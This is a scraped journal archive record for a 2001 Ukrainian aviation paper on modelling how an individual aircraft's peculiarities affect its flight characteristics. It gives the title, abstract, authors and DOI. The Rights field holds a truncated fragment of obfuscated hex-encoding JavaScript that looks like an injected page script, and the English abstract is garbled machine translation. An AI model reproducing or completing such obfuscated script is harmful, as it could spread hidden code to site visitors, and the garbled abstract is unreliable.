КОНЦЕПЦІЯ ПОБУДОВИ МОДЕЛЮВАЛЬНОГО КОМПЛЕКСУ ВИВЧЕННЯ ВПЛИВУ ІНДИВІДУАЛЬНИХ ОСОБЛИВОСТЕЙ ПОВІТРЯНОГО КОРАБЛЯ НА ЙОГО ЛЬОТНІ ХАРАКТЕРИСТИКИ
Наукові журнали Національного Авіаційного Університету
View Archive InfoField | Value | |
Title |
КОНЦЕПЦІЯ ПОБУДОВИ МОДЕЛЮВАЛЬНОГО КОМПЛЕКСУ ВИВЧЕННЯ ВПЛИВУ ІНДИВІДУАЛЬНИХ ОСОБЛИВОСТЕЙ ПОВІТРЯНОГО КОРАБЛЯ НА ЙОГО ЛЬОТНІ ХАРАКТЕРИСТИКИ
Концепция построения моделирующего комплекса изучение влияния индивидуальных особенностей воздушного корабля на его летные характеристики Concept of building a modeling complex study of the influence of individual characteristics an aircraft on its flying characteristics |
|
Creator |
Іщенко, С. О.; Національний авіаційний університет
Семігківська, Т. О.; Національний авіаційний університет |
|
Subject |
—
— УДК 533.6.013 — — — — — — |
|
Description |
Розглянуто використання математичних моделей повітряних кораблів для дослідження причин появи в них індивідуальних особливостей та ступеня їх впливу на льотні характеристики. Показано структуру універсальної математичної моделі та призначення окремих модулів, що забезпечує визначення індивідуальних льотних характеристик будь-якого типу повітряного корабля.
Рассмотрено использование математических моделей воздушных кораблей для исследования причин появления в них индивидуальных особенностей и степени их влияния на летные характеристики. Показано структуру универсальной математической модели и назначения отмых модулей, обеспечивает определение индивидуальных летных характеристик любого типа воздушного корабля. The use of mathematical models of aircraft for research is considered the reasons for the appearance in them of individual characteristics and the degree of their influence on the flight characteristics Ristiki The structure of a universal mathematical model and the purpose of MIC modules, which provides identification of the individual flight characteristics of any type of aircraft. |
|
Publisher |
National Aviation University
|
|
Contributor |
—
— — |
|
Date |
2020-01-17
|
|
Type |
—
— — |
|
Format |
application/pdf
|
|
Identifier |
http://jrnl.nau.edu.ua/index.php/visnik/article/view/13550
10.18372/2306-1472.11.13550 |
|
Source |
Proceedings of the National Aviation University; Том 11, № 4 (2001); 58-64
Вестник Национального авиационного университета; Том 11, № 4 (2001); 58-64 Вісник Національного Авіаційного Університету; Том 11, № 4 (2001); 58-64 |
|
Language |
uk
|
|
Rights |
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access). |
|